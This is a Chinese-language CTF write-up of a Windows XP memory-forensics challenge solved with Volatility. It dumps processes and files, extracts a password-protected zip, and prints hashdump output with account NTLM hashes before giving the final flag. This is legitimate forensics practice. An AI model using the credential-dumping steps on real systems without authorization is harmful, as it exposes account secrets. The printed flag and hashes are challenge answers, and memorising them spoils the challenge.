volatility -f image.raw --profile=WinXPSP2x86 cmdscan
这个好奇怪,什么都没有
volatility -f image.raw --profile=WinXPSP2x86 notepad
找到flag了很可惜,并不是这个对cmdscan的结果感到不满,发现还有其他找cmd的方法
dump出cmd的进程内存
volatility -f image.raw --profile=WinXPSP2x86 memdump -p 528 -D .
cmdline看命令行执行了什么
volatility -f image.raw --profile=WinXPSP2x86 cmdline
找到两个可疑文件
查找一下和flag有关的文件
volatility -f image.raw --profile=WinXPSP2x86 filescan|grep flag
把flag.txt dump出来
volatility -f image.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000016fd440 -D .
不知为何dump不出来,可能空文件?没懂
把aha.zipdump出来,并恢复为aha.zip
volatility -f image.raw --profile=WinXPSP2x86 filescan|grep aha
volatility -f image.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000019f5590 -D .
mv file.None.0x815f57f8.dat aha.zip
解压,发现要解压密码,继续找密码
把一些可能有hint的地方找了个遍,,没找到有用的
hashdump看用户密码
1
2
3
4
5
6# volatility -f image.raw --profile=WinXPSP2x86 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:172b5f482418a719b80c605b8d236dbf:d1e008771f7630fdd3cb50c879d2de9e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8dfedc50699ef5bdda791139eb08901e:::这几个丢到cmd5里,都不行,一个空密码两个notfound
接着又dump了浏览器进程内存、屏幕截图、ie历史、网络连接历史都没找到有用的….(我不理解
先不搞了,整了大半天…等wp吧
更新
没想到在粘贴板里面….我还真看过,,不过看完以为没用就没想起来….
- 解压后flag.txt里即为flag
flag:flag{c779d8c2-2706-464f-b466-5f8ccf3cf9fe}
麻了,下次做这种题记得随时整理已收集到的信息,不然很容易错漏一些当前没用,但后面可能有用的关键信息